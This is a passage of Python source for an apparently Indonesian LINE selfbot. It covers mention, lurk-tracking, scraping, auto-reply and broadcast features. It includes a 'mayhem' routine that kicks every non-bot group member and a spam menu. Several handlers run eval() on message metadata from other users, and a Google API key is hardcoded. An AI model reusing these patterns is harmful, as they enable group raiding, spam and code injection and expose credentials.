if dits == 'del friend on':return self.adityanuindata(to,'Friendlist',wait["Anime"],'DELFriendlist',wait)
self.sendMessage(to,' 「 Friendlist 」\nWaiting.....');self.adityaarchi(wait,'Friendlist','delfriend',to,self.adityasplittext(msg.text,'s'),msg,'\n├ Type: Delete Friendlist',nama=self.refreshContacts())
if dits.startswith('del block '):self.sendMessage(to,' 「 Blocklist 」\nWaiting.....');self.adityaarchi(wait,'Blocklist','delblock',to,self.adityasplittext(msg.text,'s'),msg,'\n├ Type: Delete Blocklist',nama=self.getBlockedRecommendationIds())
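# mentionmention(): low-level mention builder. It fills '@[adit-N]' placeholders,
# computes their start/end offsets and packs them into the 'MENTION'
# contentMetadata; 'MENTIONALLUNSED' sends then immediately unsends the message,
# 'SIDERMES' appends humanized read times, 'DELML' drops mimic-list entries.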
def mentionmention(self,to,wait, text, dataMid=[], pl='', ps='',pg='',pt=[]):
arr = []
list_text=ps
i=0
no=pl
if pg == 'MENTIONALLUNSED':
for l in dataMid:
no+=1
if no == len(pt):list_text+='\n╰'+str(no)+'. @[adit-'+str(i)+'] '
else:list_text+='\n│'+str(no)+'. @[adit-'+str(i)+'] '
i=i+1
text=list_text+text
if pg == 'SIDERMES':
for l in dataMid:
chiya = []
for rom in wait["lurkt"][to][dataMid[0]].items():
chiya.append(rom[1])
for b in chiya:
a = '{}'.format(humanize.naturaltime(datetime.fromtimestamp(b/1000)))
no+=1
if no == len(pt):list_text+='\n│'+str(no)+'. @[adit-'+str(i)+']\n╰ 「 '+a+" 」"
else:list_text+='\n│'+str(no)+'. @[adit-'+str(i)+']\n│ 「 '+a+" 」"
i=i+1
text=list_text+text
if pg == 'DELML':
for l in dataMid:
if l not in wait["target"]:
a = 'Not ML User'
else:
a = 'DEL ML'
wait["target"].remove(l)
no+=1
if no == len(pt):list_text+='\n╰'+str(no)+'. @[adit-'+str(i)+'] '+a
else:list_text+='\n│'+str(no)+'. @[adit-'+str(i)+'] '+a
i=i+1
text=list_text
i=0
for l in dataMid:
mid=l
name='@[adit-'+str(i)+']'
ln_text=text.replace('\n',' ')
if ln_text.find(name):
line_s=int( ln_text.index(name) )
line_e=(int(line_s)+int( len(name) ))
arrData={'S': str(line_s), 'E': str(line_e), 'M': mid}
arr.append(arrData)
i=i+1
contentMetadata={'MENTION':str('{"MENTIONEES":' + json.dumps(arr).replace(' ','') + '}')}
if pg == 'MENTIONALLUNSED':self.unsendMessage(self.sendMessage(to, text, contentMetadata).id)
else:self.sendMessage(to, text, contentMetadata)
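# pictlock(): 'pict lock on' adds the group to wait['ppict'] and maps it to a
# local copy under dataSeen/, presumably so another handler can restore the
# picture if it changes; 'pict lock off' removes the group from the watch list.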
def pictlock(self,msg,wait):
if msg.text.lower().startswith('pict lock '):
spl = msg.text.lower().replace('pict lock ','')
if spl == 'on':
contact = self.getGroup(msg.to).pictureStatus
cu = "http://dl.profile.line-cdn.net/" + contact
if msg.to in wait['ppict']:
msgs=" 「 Picture Lock 」\nStatus: already ENABLED♪"
wait['GN'] = True
else:
msgs=" 「 Picture Lock 」\nStatus: set to ENABLED♪"
wait['ppict'].append(msg.to)
wait['GN'] = True
wait['pro_pict'][msg.to] = 'dataSeen/'+msg.to+'.png'
self.sendMessage(msg.to, msgs)
self.sendImageWithURL(msg.to,cu)
if spl == 'off':
if msg.to in wait['ppict']:
msgs=" 「 Picture Lock 」\nStatus: set to DISABLED♪"
wait['ppict'].remove(msg.to)
else:
msgs=" 「 Picture Lock 」\nStatus: already DISABLED♪"
self.sendMessage(msg.to, msgs)
def adityanuindata(self,to,text,data,pl,wait):
if 'ADDWhitelist' in pl:
wait["wwhitelist"] = True
b = " 「 {} 」\nType: Add {}\nStatus: Turned ON\nSend a contact to add into {}♪".format(text,text,text)
if 'ADDBlacklist' in pl:
wait["wblacklist"] = True
b = " 「 {} 」\nType: Add {}\nStatus: Turned ON\nSend a contact to add into {}♪".format(text,text,text)
if 'DELWhitelist' in pl:
wait["dwhitelist"] = True
b = " 「 {} 」\nType: Delete {}\nStatus: Turned ON\nSend a contact to delete from {}♪".format(text,text,text)
if 'DELBlacklist' in pl:
wait["dblacklist"] = True
b = " 「 {} 」\nType: Delete {}\nStatus: Turned ON\nSend a contact to delete from {}♪".format(text,text,text)
if 'DELFriendlist' in pl:
wait["Anime"] = True
b = " 「 {} 」\nType: Delete {}\nStatus: Turned ON\nSend a contact to delete from {}♪".format(text,text,text)
self.sendMessage(to,b)
def changedpgroup(self,wait,msg):
if msg.toType == 2:
if msg.to not in wait["setTimess"]:
wait["setTimess"].append(msg.to)
self.sendMessage(msg.to, " 「 Group 」\nType: Change Cover Group\nStatus: Send the image....")
def spam(self,wait):return "╭───「 Spam 」─\n│ | Command | \n│Message\n│ Key: "+wait["setkey"].title()+"spam 1 [1][enter|text]\n│Gift\n│ Key: "+wait["setkey"].title()+"spam 2 [1][@|]\n│Contact\n│ Key: "+wait["setkey"].title()+"spam 3 [1][@]\n│Tag\n│ Key: "+wait["setkey"].title()+"spam 4 [1][@]\n╰──────"
def mykey(self,wait):
if wait["setkey"] == '':return "Your Prefix : [On]\nPrefix change - [query]\nPrefix off - Disable\nPrefix Reset - Reset the Prefix"
else:return "Your Prefix : " + wait["setkey"].title() + "\nReprefix: - [query]\nPrefix Off - Disable\nPrefix Reset - Reset the Prefix"
def getid(self,wait,msg,dits):
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
self.getinformation(msg.to,key1,wait)
else:
if dits.startswith("getid"):
if len(dits.split(' ')) == 2:
a = self.getGroupIdsJoined()
self.getinformation(msg.to,a[int(dits.split(' ')[1])-1],wait)
if dits == 'getid':self.getinformation(msg.to,msg.to,wait)
def stealcover(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith('steal cover') or msg.text.lower() == 'steal cover' or msg.text.lower() == 'my cover':
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
self.sendImageWithURL(msg.to,'{}'.format(self.getProfileCoverURL(key1)),'Cover Picture')
else:
if msg.text.lower() == 'my cover':
self.sendImageWithURL(msg.to,'{}'.format(self.getProfileCoverURL(msg._from)),'Cover Picture')
if msg.text.lower() == 'steal cover':
if msg.toType == 2:
return
self.sendImageWithURL(msg.to,'{}'.format(self.getProfileCoverURL(msg.to)),'Cover Picture')
def stealpp(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith('steal pp') or msg.text.lower() == 'steal pp' or msg.text.lower() == 'my pp':
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
try:contact = self.getGroup(key1)
except:contact = self.getContact(key1)
try:
cu = "http://dl.profile.line.naver.jp"+ contact.picturePath + "/vp"
self.sendVideoWithURL(msg.to,cu)
cu = "http://dl.profile.line.naver.jp" + contact.picturePath
self.sendImageWithURL(msg.to,cu,'{} Picture'.format(contact.displayName))
except:
cu = "http://dl.profile.line.naver.jp" + contact.picturePath
self.sendImageWithURL(msg.to,cu,'{} Picture'.format(contact.displayName))
else:
if msg.text.lower() == 'steal pp':to = msg.to
if msg.text.lower() == 'my pp':to = msg._from
if msg.toType == 2:contact = self.getGroup(to);pppp = contact.name
else:contact = self.getContact(to);pppp = contact.displayName
try:
cu = "http://dl.profile.line.naver.jp"+ contact.picturePath + "/vp"
self.sendVideoWithURL(msg.to,cu)
except:
cu = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
self.sendImageWithURL(msg.to,cu,'{} Picture'.format(pppp))
def mayhem(self,msg):
a = []
b = self.getGroup(msg.to)
for i in b.members:
if i.mid not in wait["bots"]:
a.append(i.mid)
self.sendMessage(msg.to," 「 Mayhem 」\nMayhem is STARTING♪\n'abort' to abort♪""")
self.sendMessage(msg.to," 「 Mayhem 」\n %i victims shall yell hul·la·ba·loo♪\n/ˌhələbəˈlo͞o,ˈhələbəˌlo͞o/" % len(a))
for c in a:
self.kickoutFromGroup(msg.to,[c])
def sendMessages(self, messageObject):
return self.talk.sendMessage(0, messageObject)
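# AdityaWeather(): queries the (now retired) Yahoo YQL weather endpoint, sends a
# forecast summary and a location pin for the matched city, and falls back to a
# "Location not found" reply on any failure.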
def AdityaWeather(self,msg):
msg.text = self.mycmd(msg.text,wait)
ts = self.adityasplittext(msg.text)
t = msg.to
try:
data = self.adityarequestweb("https://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20weather.forecast%20where%20woeid%20in%20(select%20woeid%20from%20geo.places(1)%20where%20text%3D%22{}%2C%20id%22)&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys".format(ts))
wloc = data['query']['results']['channel']['location']
wlocs = data['query']['results']['channel']['item']['condition']
wlocss = data['query']['results']['channel']['wind']
wlocsss = data['query']['results']['channel']['atmosphere']
b = float(data['query']['results']['channel']['item']['lat'])
h = float(data['query']['results']['channel']['item']['long'])
a = '🔭 Weather Forecast\n{},{} {}\n\nTemperature {} \u00b0C {}\nRange 22 to 28 \u00b0C\nWind {}.{} km/h\nDirection {}\u00b0\nHumidity {}%\n\n🗓 {}'.format(wloc['city'],wloc['region'],wloc['country'],wlocs['code'],wlocs['text'],wlocss['speed'],wlocss['chill'],wlocss['direction'],wlocsss['humidity'],data['query']['results']['channel']['lastBuildDate'])
self.sendMessage(t,a)
msgs = Message()
msgs.to = msg.to
msgs.location=Location(longitude=h, address='{}.{} {}'.format(wloc['city'],wloc['region'],wloc['country']), title=' 「 Location 」', phone=None, latitude=b)
self.sendMessages(msgs)
except:
return self.sendMessage(t, "Lokasi Tidak Ditemukan")
def lurk(self,to,data):
wait = data
if 'lurkauto' not in wait:wait['lurkauto'] = False
if wait['lurkauto'] == False:sd = "\n│Lurk Auto: OFF"
else:sd = "\n│Lurk Auto: ON"
if to in data['readPoint']:
a = "\n│Lurk State: ON"+sd
else:
a = "\n│Lurk State: OFF"+sd
if to in data["lurkp"]:
if data["lurkp"][to] == {}:
b='\n╰Lurk People: None'
h="╭「 Lurk 」─"+a+"\n│ | Command | \n│Lurtk Point\n│ Key: "+data["setkey"].title()+" lurk on\n│ Key: "+data["setkey"].title()+" lurk auto on\n│Lurk Del\n│ Key: "+data["setkey"].title()+" lurk off\n│ Key: "+data["setkey"].title()+" lurk auto off\n│Lurk Cek\n│ Key: "+data["setkey"].title()+" lurk result"
self.sendMessage(to,h+b)
else:
h= "╭「 Lurk 」─"+a+"\n│ | Command | \n│Lurk Point\n│ Key: "+data["setkey"].title()+" lurk on\n│ Key: "+data["setkey"].title()+" lurk auto on\n│Lurk Del\n│ Key: "+data["setkey"].title()+" lurk off\n│ Key: "+data["setkey"].title()+" lurk auto off\n│Lurk Cek\n│ Key: "+data["setkey"].title()+" lurk result\n│Lurk People: {}".format(len(data["lurkp"][to]))
no=0
hh = []
for c in data["lurkp"][to]:
no+=1
hh.append(c)
if no == len(data["lurkp"][to]):h+= '\n╰ {}. @!'.format(no)
else:h+= '\n│ {}. @!'.format(no)
self.sendMention(to,h,'',hh)
else:
b='\n╰Lurk People: None'
h="╭「 Lurk 」─"+a+"\n│ | Command | \n│Lurk Point\n│ Key: "+data["setkey"].title()+" lurk on\n│ Key: "+data["setkey"].title()+" lurk auto on\n│Lurk Del\n│ Key: "+data["setkey"].title()+" lurk off\n│ Key: "+data["setkey"].title()+" lurk auto off\n│Lurk Cek\n│ Key: "+data["setkey"].title()+" lurk result"
self.sendMessage(to,h+b)
def animeget(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
r = requests.get('https://www.kurogaze.top/ongoing-anime/')
s = BeautifulSoup(r.text,'html5lib')
dd = s.select('ul > li > div.sera > a.series')
sgd = s.select('ul > li > div.sera > a.series > div.title > span')
if msg.text.lower().startswith('anilist'):
if len(msg.text.split(' ')) == 1:
d = '╭「 Anime List 」'
no = 0
for c in sgd:
no+=1
if no == len(sgd):sdk = '╰'
else:sdk = '│'
d+= '\n{}{}. {}'.format(sdk,no,c.text.replace('no Imouto','no\n│ Imouto').replace('– Kaikou','–\n│ Kaikou').replace('Gale Online','Gale\n│ Online').replace('Genwaku Kitan','Genwaku\n│ Kitan').replace('Izakaya Nobu','Izakaya\n│ Nobu').replace('no Monogatari','no\n│ Monogatari'))
self.sendMessage(msg.to,'{}'.format(d))
if len(msg.text.split(' ')) == 2:
ds = dd[int(msg.text.split(' ')[1])-1]
sgd = sgd[int(msg.text.split(' ')[1])-1]
self.sendMessage(msg.to,' 「 Anime 」\nStatus: Waiting....\nRequest: Get a {}'.format(sgd.text))
r = requests.get(ds.get('href'))
s = BeautifulSoup(r.text,'html5lib')
dd = s.select('div.episodelist > ul > li > span.t1 > a')
ddd = s.select('div.episodelist > ul > li > span.t2')
d = ' 「 Episode List 」\n | Anime {} |'.format(sgd.text)
no = 0
dd = [c.text.strip() for c in dd];dd.reverse()
ddd = [c.text.strip() for c in ddd];ddd.reverse()
for c in range(0,len(dd)):
no+=1
d+= '\n{}. {} | {}'.format(no,dd[c],ddd[c])
self.sendMessage(msg.to,d)
if len(msg.text.split(' ')) == 3:
ds = dd[int(msg.text.split(' ')[1])-1]
sgd = sgd[int(msg.text.split(' ')[1])-1]
self.sendMessage(msg.to,' 「 Anime 」\nStatus: Waiting....\nRequest: Get a {}\nTarget: {}'.format(sgd.text,msg.text.split(' ')[2]))
r = requests.get(ds.get('href'))
s = BeautifulSoup(r.text,'html5lib')
dd = s.select('div.episodelist > ul > li > span.t3 > a')
dd = [c.get('href') for c in dd]
dd.reverse()
ds = dd[int(msg.text.split(' ')[2])-1]
r = requests.get(ds)
s = BeautifulSoup(r.text,'html5lib')
try:
try:
sdd = s.select('div.thumbnail')[0].find('img')['data-lazy-src']
self.sendImageWithURL(msg.to,sdd,'Anime')
except:
pass
sd = s.select('div.dl-box > div > a')
ggg = " 「 {} 」".format(s.select('div.headpost > h1.title')[0].text)
h = [self.google_url_shorten(a.get('href')) for a in sd if a.text == 'GDrive']
ggg+= '\n{}\n\n{}\n\n | Downloader |\n 1. 240P {}\n 2. 360P {}\n 3. 480P {}\n 4. 720P {}'.format(s.select('div.singlecontent > p')[0].text,s.select('div.singlecontent > p')[1].text.replace('Genres','\nGenres').replace('Credit','\nCredit'),h[0],h[1],h[2],h[3])
self.sendMessage(msg.to,ggg)
except:self.sendMessage(msg.to," 「 404 」\nStatus: Error So sorry I'cant Find a Video or maybe this episode hasbeen del")
def google_url_shorten(self,url):
req_url = 'https://www.googleapis.com/urlshortener/v1/url?key=AIzaSyAzrJV41pMMDFUVPU0wRLtxlbEU-UkHMcI'
payload = {'longUrl': url}
headers = {'content-type': 'application/json'}
r = requests.post(req_url, data=json.dumps(payload), headers=headers)
resp = json.loads(r.text)
return resp['id'].replace("https://","")
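# kaskusget(): 'kaskus ht' lists the current Kaskus hot threads; 'kaskus ht [num]'
# scrapes the selected thread page and sends roughly the first 3000 characters
# in a link template, plus the thread image when one is available.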
def kaskusget(self,msg,wait):
msg.text = self.mycmd(msg.text,wait)
kaskus = Kaskus()
if msg.text.lower().startswith('kaskus ht'):
h = kaskus.getHotThreads()
if len(msg.text.split(' ')) == 2:
d = ' 「 Kaskus Hot Thread 」'
no = 0
for c in h.data:
no+=1
d+= '\n{}. {}'.format(no,c.title)
self.sendMessage(msg.to,d)
if len(msg.text.split(' ')) == 3:
d = h.data[int(msg.text.split(' ')[2])-1]
r = requests.get(d.short_url)
s = BeautifulSoup(r.text,'html5lib')
sd = s.find_all('span',{'data-attr':'size'})
tt = ''
for a in sd:
if a == sd[0]:tt+= ''+a.text
else:tt+= '\n\n'+a.text
self.sendMessage(msg.to,'{}....'.format(tt[:2996].strip()), self.templatefoot(str(d.short_url),'https://lh3.googleusercontent.com/MJjKnEPXaCF9FCEILJGvShuPnrw1yMt1yAZgBMiD7J3EvmXvmzFYatAsXlvSWhstNw',str(d.title)))
try:self.sendImageWithURL(msg.to,d.image,'Kaskus')
except:pass
def lurkoff(self,to,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
targets = key["MENTIONEES"][0]["M"]
if targets not in wait['readPoints']:
self.sendMention(to, " 「 Lurk 」\nLurk in @! already mute",'',[targets])
else:
try:
del wait['readPoints'][targets];wait['lurkt'][to] = {};wait['lurkp'][to] = {}
except:
pass
self.sendMention(to, " 「 Lurk 」\nLurk in @! set to mute",'',[targets])
else:
if msg.text.lower() == "lurk off":
if msg.to not in wait['readPoint']:
self.sendMessage(to, " 「 Lurk 」\nLurk already off")
else:
try:
del wait['readPoint'][to];wait['setTime'][to] = {};wait['ROM1'][to] = {}
except:
pass
self.sendMessage(to, " 「 Lurk 」\nLurk point off")
def lurkon(self,to,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
targets = key["MENTIONEES"][0]["M"]
if targets in wait['readPoints']:
self.sendMention(to, " 「 Lurk 」\nLurk in @! already active",'',[targets])
else:
try:
del wait['readPoints'][targets];del wait['lurkt'][to];del wait['lurkp'][to][targets]
except:
pass
wait['readPoints'][targets] = msg.id
if to not in wait['lurkt']:
wait['lurkt'][to] = {}
wait['lurkp'][to] = {}
if targets not in wait['lurkp'][to]:
wait['lurkp'][to][targets] = {}
wait['lurkt'][to][targets] = {}
self.sendMention(to, " 「 Lurk 」\nLurk in @! set to active",'',[targets])
else:
if msg.text.lower() == "lurk on":
if to in wait['readPoint']:
self.sendMessage(to, " 「 Lurk 」\nLurk already set")
else:
try:
del wait['readPoint'][to];del wait['setTime'][to]
except:
pass
wait['readPoint'][to] = msg.id;wait['setTime'][to] = {};wait['ROM1'][to] = {}
self.sendMessage(to, " 「 Lurk 」\nLurk point set♪")
def lurkauto(self,to,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower() == "lurk auto off":
if wait['lurkauto'] == False:
self.sendMessage(to, " 「 Lurk 」\nLurk auto already off")
else:
wait['lurkauto'] = False
self.sendMessage(to, " 「 Lurk 」\nLurk auto point off")
if msg.text.lower() == "lurk auto on":
if to in wait['readPoint']:
if wait['lurkauto'] == True:self.sendMessage(to, " 「 Lurk 」\nLurk already set")
else:
try:
del wait['readPoint'][to];del wait['setTime'][to]
except:
pass
wait['readPoint'][to] = msg.id;wait['setTime'][to] = {};wait['ROM1'][to] = {}
wait['lurkauto'] = True
self.sendMessage(to, " 「 Lurk 」\nLurk point set")
def cekmention(self,to,wait):
if to in wait['ROM']:
moneys = {}
msgas = ''
for a in wait['ROM'][to].items():
moneys[a[0]] = [a[1]['msg.id'],a[1]['waktu']] if a[1] is not None else [[],[]]  # empty fallback when no mention record exists
sort = sorted(moneys)
sort.reverse()
sort = sort[0:]
msgas = ' 「 Mention Me 」'
h = []
no = 0
for m in sort:
has = ''
nol = -1
for kucing in moneys[m][0]:
nol+=1
has+= '\nline://nv/chatMsg?chatId={}&messageId={} {}\nType resetmentionme to reset the cekmention data!'.format(to,kucing,humanize.naturaltime(datetime.fromtimestamp(moneys[m][1][nol]/1000)))
h.append(m)
no+=1
if m == sort[0]:
msgas+= '\n{}. @!{}x{}'.format(no,len(moneys[m][0]),has)
else:
msgas+= '\n\n{}. @!{}x{}'.format(no,len(moneys[m][0]),has)
self.sendMention(to, msgas,'', h)
del wait['ROM'][to]
else:
try:
msgas = 'Oops @! No mention data in {}'.format(self.getGroup(to).name)
self.sendMention(to, msgas,' 「 Mention Me 」\n', [self.getProfile().mid])
except:
msgas = 'Oops @! No mention data in {}'
self.sendMention(to, msgas,' 「 Mention Me 」\n', [self.getProfile().mid,to])
def adityasuperdata(self,msg,wait,text='',text1='',data=[]):
to = msg.to
key = wait["setkey"].title()
if data == []:return self.sendMessage(to, "╭───「 {} 」─\n│{}: None\n│ | Command | \n│Add {}\n│ Key:{} add{} [@|on]\n│Del {}\n│ Key:{} del{} [@|on|>|<|num 1]\n╰──────".format(text,text,text,key,text1,text,key,text1,key,text1))
self.datamention(msg,'{}'.format(text),data)
def lurkr(self,to,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
targets = key["MENTIONEES"][0]["M"]
if targets in wait['readPoints']:
chiya = []
for rom in wait["lurkp"][to][targets].items():
chiya.append(rom[1])
k = len(chiya)//100
for a in range(k+1):
if a == 0:self.mentionmention(to=to,wait=wait,text='',dataMid=chiya[:100],pl=0,ps='╭「 Lurkers 」─',pg='SIDERMES',pt=chiya)
else:self.mentionmention(to=to,wait=wait,text='',dataMid=chiya[a*100 : (a+1)*100],pl=a*100,ps='├「 Lurkers 」─',pg='SIDERMES',pt=chiya)
wait['lurkt'][to][targets] = {};wait['lurkp'][to][targets] = {}
else:self.sendMention(to, " 「 Lurk 」\nLurk in @! not active",'',[targets])
else:
if msg.text.lower() == "lurk result":
if to in wait['readPoint']:
try:
self.anulurk(to,wait)
wait['setTime'][to] = {}
except:self.sendMessage(to,' 「 Lurkers 」─\n╰ None')
else:self.sendMessage(to, " 「 Lurk 」\nLurk point not on♪")
def anulurk(self,to,wait):
moneys = {}
for a in wait["setTime"][to].items():
moneys[a[1]] = [a[0]] if a[1] is not None else []  # empty fallback when the read timestamp is missing
sort = sorted(moneys)
sort = sort[0:]
k = len(sort)//100
for a in range(k+1):
if a == 0:no= a;msgas = ' 「 Lurkers 」'
else:no = a*100;msgas = ' 「 Lurkers 」'
h = []
for i in sort[a*100 : (a+1)*100]:
h.append(moneys[i][0])
no+=1
a = '{}'.format(humanize.naturaltime(datetime.fromtimestamp(i/1000)))
if no == len(sort):msgas+='\n{}. @!\n 「 {} 」'.format(no,a)
else:msgas+='\n{}. @!\n 「 {} 」'.format(no,a)
self.sendMention(to, msgas,'', h)
def autoaddmsgset(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split("\n")) >= 2:
wait["autoaddpesan"] = msg.text.replace(msg.text.split("\n")[0]+"\n","").replace('|','@!')
self.sendMessage(msg.to,"Pesan Auto add diterapkan menjadi :\n" + wait["autoaddpesan"])
def autoaddoff(self,wait):
if wait['autoAdd'] == False:
msgs="Auto Add already [Off]"
else:
msgs="AutoAdd set to [Off]"
wait['autoAdd']=False
return msgs
def autoaddon(self,wait):
if wait['autoAdd'] == True:
msgs="Auto Add already [On]."
else:
msgs="Auto Add set to [On]."
wait['autoAdd']=True
return msgs
def autoresponoff(self,wait,msg):
if msg.to not in wait["GROUP"]['AR']['AP']:
msgs="Auto Respon already [Off]"
else:
msgs="Auto Respon set to [Off]"
wait["GROUP"]['AR']['AP'].remove(msg.to)
return msgs
def autoresponmsgclear(self,wait,msg):
autorespon = wait["GROUP"]['AR']['P'][msg.to]
msgs="Auto Respon [Off]\nMessage backup:"
msgs+="\n" + autorespon
wait["GROUP"]['AR']['P'][msg.to] = ""
return msgs
def autoresponon(self,wait,msg):
if msg.to in wait["GROUP"]['AR']['AP']:
msgs="Auto Respon already [On]"
else:
msgs="Auto Respon set to [On]"
wait["GROUP"]['AR']['AP'].append(msg.to)
return msgs
def autoresponmsgset(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split("\n")) >= 2:
wait["GROUP"]['AR']['P'][msg.to] = msg.text.replace(msg.text.split("\n")[0]+"\n","")
self.sendMessage(msg.to,"Pesan Auto Respon diterapkan menjadi :\n" + wait["GROUP"]['AR']['P'][msg.to])
def autorespon(self,wait,msg):
if msg.to in wait["GROUP"]['AR']['AP']:
msgs="Auto Respon: [On]"
if msg.to in wait["GROUP"]['AR']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['AR']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['AR']['P']:
if wait["GROUP"]['AR']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['AR']['P'][msg.to] + "\n"
else:msgs+=''
else:
msgs="Auto Respon: [Off]"
if msg.to in wait["GROUP"]['AR']['S']:
a = self.shop.getProduct(packageID=int(wait["GROUP"]['AR']['S'][msg.to]['Sticker']['STKPKGID']), language='ID', country='ID')
msgs+="\nSticker: " + a.title
else:msgs+=''
if msg.to in wait["GROUP"]['AR']['P']:
if wait["GROUP"]['AR']['P'][msg.to] == '':msgs+= ''
else:msgs+="\nMessage: \n" + wait["GROUP"]['AR']['P'][msg.to] + "\n"
else:msgs+=''
return msgs+"\n- AutoRespon Set\n Usage:"+wait["setkey"].title()+" autorespon [on|off]\n- AutoRespon Sticker\n Usage:"+wait["setkey"].title()+" add stickerauto respon\n- autorespon msg setting\n Usage:"+wait["setkey"].title()+" autorespon msg set <text>\n OR:"+wait["setkey"].title()+" autorespon msg set <text|text>"
def autoaddmsgclear(self,wait):
autoadd = wait["autoaddpesan"]
msgs="Pesan Auto add [Off]\nMessage backup:"
msgs+="\n" + autoadd
wait["autoaddpesan"] = ""
return msgs
def fancynameon(self,msg,wait,sdg):
msg.text = self.mycmd(msg.text,wait)
wait['talkban'] = {'time':time.time(),'timer':int(self.adityasplittext(msg.text.lower(),'s')),'cvp':False,'video':'','pict':''}
if 'name' not in wait['talkban']:wait['talkban']['name'] = sdg
if wait['ChangeCover'] == True:
msgs="Fancy Name already [On] With Timer {}secs".format(wait['talkban']['timer'])
else:
msgs="Fancy Name set to [On] With Timer {}secs".format(wait['talkban']['timer'])
wait['ChangeCover']=True
return msgs
def fancynameoff(self,wait):
if wait['ChangeCover'] == False:
msgs="Fancy Name already [Off]"
else:
msgs="Fancy Name set to [Off]"
wait['ChangeCover']=False
wait['talkban'] = {'time':time.time(),'timer':wait['talkban']['timer'],'cvp':False,'video':'','pict':'','name':wait['talkban']['name']}
self.updateProfileAttribute(2, wait['talkban']['name'])
return msgs
def autoadd(self,wait):
if wait['autoAdd'] == True:
if wait["autoaddpesan"] == '':
msgs="Add Back: [On]\nAdd Message: [Off]\n\n\n"
else:
msgs="Add Back: [On]\nAdd Message: [On]"
msgs+="\n" + wait['autoaddpesan'] + "\n\n"
else:
if wait["autoaddpesan"] == '':
msgs=" 「 Auto Add 」\nAdd Back: [Off]\nAdd Message: False♪\n\n\n"
else:
msgs=" 「 Auto Add 」\nAdd Back: [Off]\nAdd Message: [On]"
msgs+="\n" + wait['autoaddpesan'] + "\n"
return msgs+"\n |Command|\n- Autoadd friend\n Usage:"+wait["setkey"].title()+" autoadd [on|off]\n- Autoadd msg setting\n Usage:"+wait["setkey"].title()+" autoadd msg set <text>\n OR:"+wait["setkey"].title()+" autoadd msg set <text|text>"
def anugrupinvitti(self,op,wait,waita,sdd):
if self.getProfile().mid in op.param3 and waita["name"][sdd]["pay"] >= time.time():
G = self.getCompactGroup(op.param1)
if wait["autoJoin"] == True:
if len(G.members) <= wait["Members"]:
self.rejectGroupInvitation(op.param1)
else:
self.acceptGroupInvitation(op.param1)
if len(G.members) <= wait["Members"]:
self.rejectGroupInvitation(op.param1)
else:
if op.param1 in wait['kitsuneshare']:
group = self.getCompactGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
if _mid in op.param3:
self.cancelGroupInvitation(op.param1,[_mid])
else:pass
def waktunjir(self):
sd = ''
if datetime.now().hour >= 1 and datetime.now().hour < 10:sd+= 'Good Morning'
if datetime.now().hour >= 10 and datetime.now().hour < 15:sd+= 'Good Afternoon'
if datetime.now().hour >= 15 and datetime.now().hour < 18:sd+= 'Good Evening'
if datetime.now().hour >= 18 or datetime.now().hour < 1:sd+= 'Good Night'
return sd
def anuaccgroup(self,op,wait,waita,sdd):
if op.param1 in wait["GROUP"]['WM']['AP'] and waita["name"][sdd]["pay"] >= time.time():
if op.param1 in wait["GROUP"]['WM']['S']:
self.sendMessage(op.param1,text=None,contentMetadata=wait["GROUP"]['WM']['S'][op.param1]['Sticker'], contentType=7)
if(wait["GROUP"]['WM']['P'][op.param1] in [""," ","\n",None]):
return
if '@!' not in wait["GROUP"]['WM']['P'][op.param1]:
wait["GROUP"]['WM']['P'][op.param1] = '@!'+wait["GROUP"]['WM']['P'][op.param1]
nama = self.getGroup(op.param1).name
sd = self.waktunjir()
self.sendMention(op.param1,wait["GROUP"]['WM']['P'][op.param1].replace('greeting',sd).replace('Greeting',sd).replace(';',nama),' ',[op.param2]*wait["GROUP"]['WM']['P'][op.param1].count('@!'))
def anualeavegroup(self,op,wait,waita,sdd):
if op.param1 in wait["GROUP"]['LM']['AP'] and waita["name"][sdd]["pay"] >= time.time():
if op.param1 in wait["GROUP"]['LM']['S']:
self.sendMessage(op.param2,text=None,contentMetadata=wait["GROUP"]['LM']['S'][op.param1]['Sticker'], contentType=7)
self.sendMention(op.param2, "{}".format(wait["GROUP"]['LM']['P'][op.param1].replace('|',' @!')),' ',[op.param2])
def sendstickers(self,msg):
msg.text = self.mycmd(msg.text,wait)
if len(msg.text.split(" ")) >= 2:
self.sendall(msg.to,self.adityasplittext(msg.text,'s'))
def setbroadcast(self,wait,msg):
msg.text = self.mycmd(msg.text,wait)
if msg.text.lower().startswith('broadcast 3'):
if len(msg.text.split("\n")) >= 2:
a = self.getGroupIdsJoined()
for i in a:
G = self.getGroup(i)
if len(G.members) > wait["Members"]:
self.sendMessage(i,msg.text.replace(msg.text.split("\n")[0]+"\n",""))
if msg.text.lower().startswith('broadcast 2'):
if len(msg.text.split("\n")) >= 2:
a = self.getAllContactIds()
for i in a:
self.sendMessage(i,msg.text.replace(msg.text.split("\n")[0]+"\n",""))
if msg.text.lower().startswith('broadcast 1'):
